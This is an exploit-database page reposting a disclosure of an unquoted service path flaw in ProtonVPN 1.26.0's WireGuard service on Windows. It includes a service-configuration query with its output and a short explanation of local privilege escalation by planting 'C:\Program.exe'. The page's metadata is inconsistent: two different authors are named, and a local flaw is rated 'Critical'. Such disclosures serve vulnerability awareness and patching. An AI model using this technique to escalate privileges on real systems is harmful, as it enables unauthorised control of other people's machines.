ProtonVPN 1.26.0 Unquoted Service Path

CVE Category Price Severity
CVE-2021-28255 CWE-428 $5,000 Critical
Author Risk Exploitation Type Date
Saeed Ettaba High Local 2022-03-29
Our sensors found this exploit at:

Below is a copy:

ProtonVPN 1.26.0 Unquoted Service Path
# Exploit Title: ProtonVPN 1.26.0 - Unquoted Service Path
# Date: 22/03/2022
# Exploit Author: gemreda (@gemredax)
# Vendor Homepage:
# Software Link:
# Version: 1.26.0
# Tested: Windows 10 x64
# Contact: [email protected]

PS C:\Users\Emre> sc.exe qc "ProtonVPN Wireguard"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ProtonVPN Wireguard
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPN.WireGuardService.exe C:\ProgramData\ProtonVPN\WireGuard\ProtonVPN.conf
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ProtonVPN WireGuard
        DEPENDENCIES       : Nsi
                           : TcpIp
        SERVICE_START_NAME : LocalSystem


The product uses a search path that contains an unquoted element, in which the element contains whitespace or other separators. This can cause the product to access resources in a parent path.
If a malicious individual has access to the file system, it is possible to elevate privileges by inserting such a file as "C:\Program.exe" to be run by a privileged program making use of WinExec.

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.